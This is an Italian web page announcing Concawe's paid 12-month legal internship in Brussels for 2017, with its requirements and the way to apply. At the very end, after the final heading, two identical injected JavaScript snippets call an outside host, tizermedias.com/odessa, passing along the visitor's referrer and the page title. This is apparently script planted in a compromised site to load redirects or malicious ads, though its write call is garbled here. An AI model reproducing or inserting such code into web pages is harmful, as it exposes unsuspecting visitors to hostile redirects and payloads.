Tirocinio Concawe 2017

Concawe, associazione di consulenza legale per le Istituzioni Europee in materia di ambiente e sostenibilità all’interno dell’approvvigionamento e uso dei prodotti petroliferi, offre un tirocinio retribuito presso i suoi uffici di Bruxelles nel settore legale.

A chi è rivolto

Il tirocinio Concawe 2017 è rivolto a cittadini dell’Unione Europea o con il permesso di lavorare in Europa in possesso di laurea in Griurisprudenza. Sono richieste buona conoscenza professionale dell’inglese e del francese. I candidati devono aver maturato precedente esperienza professionale in una compagnia internazionale, avere buone doti comunicative, capacità di lavorare in autonomia e in un team e saper rispettare le scadenze.

L’importo e la durata

Il tirocinio Concawe 2017 ha una durata pari a 12 mesi ed è retribuito.

I requisiti

Per candidarsi al tirocinio Concawe 2017 bisogna essere in possesso dei seguenti requisiti:

  • cittadinanza di uno Stato membro dell’Unione Europea;
  • laurea in Giurisprudenza;
  • conoscenza della lingua inglese e dei termini legali;
  • conoscenza del francese e dei termini legali;
  • precedente esperienza professionale in una compagnia internazionale;
  • essere bravi comunicatori, capacità di lavorare in squadra e autonomamente, rispetto per le scadenze.

Come e quando presentare domanda

Per candidarsi al tirocinio Concawe 2017 bisogna inviare Curriculum Vitae e lettera di presentazione all’indirizzo recruitment@concawe.org, specificando nell’oggetto “Legal internship”. La data di scadenza per l’invio delle candidature è il 7 maggio 2017.

Bando tirocinio Concawe 2017(function(){var d=document;var w=’240′;var h=’300′;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();(function(){var d=document;var w=’240′;var h=’300’;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();